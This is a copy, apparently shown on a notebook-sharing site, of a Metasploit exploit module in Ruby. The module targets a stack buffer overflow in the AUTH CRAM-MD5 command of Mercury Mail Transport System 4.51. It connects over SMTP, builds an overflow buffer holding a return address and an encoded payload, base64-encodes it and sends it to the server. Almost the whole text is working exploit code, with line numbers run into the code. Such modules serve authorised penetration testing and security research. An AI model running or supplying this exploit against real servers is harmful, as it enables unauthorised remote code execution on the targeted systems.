Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/smtp/mercury_cram_md5.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.15By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker16may be able to execute arbitrary code.17},18'Author' => [ 'MC' ],19'References' =>20[21[ 'CVE', '2007-4440' ],22[ 'OSVDB', '39669' ],23[ 'BID', '25357' ],24],25'DefaultOptions' =>26{27'EXITFUNC' => 'thread',28},29'Platform' => 'win',30'Privileged' => true,31'Payload' =>32{33'Space' => 600,34'BadChars' => "\x00\x0a\x0d\x20\x25",35'StackAdjustment' => -3500,36},37'Targets' =>38[39[ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll40],41'DefaultTarget' => 0,42'DisclosureDate' => '2007-08-18'))4344register_options([ Opt::RPORT(25) ])45end4647def exploit48connect4950sock.get_once5152sock.put("EHLO\r\n")5354sock.get_once5556sock.put("AUTH CRAM-MD5\r\n")5758sock.get_once59select(nil,nil,nil,0.25)6061buffer = rand_text_alpha_upper(204) + [target.ret].pack('V')62buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)6364sploit = Rex::Text.encode_base64(buffer)6566print_status("Trying target #{target.name}...")67sock.put(sploit + "\r\n")6869handler70disconnect71end72end737475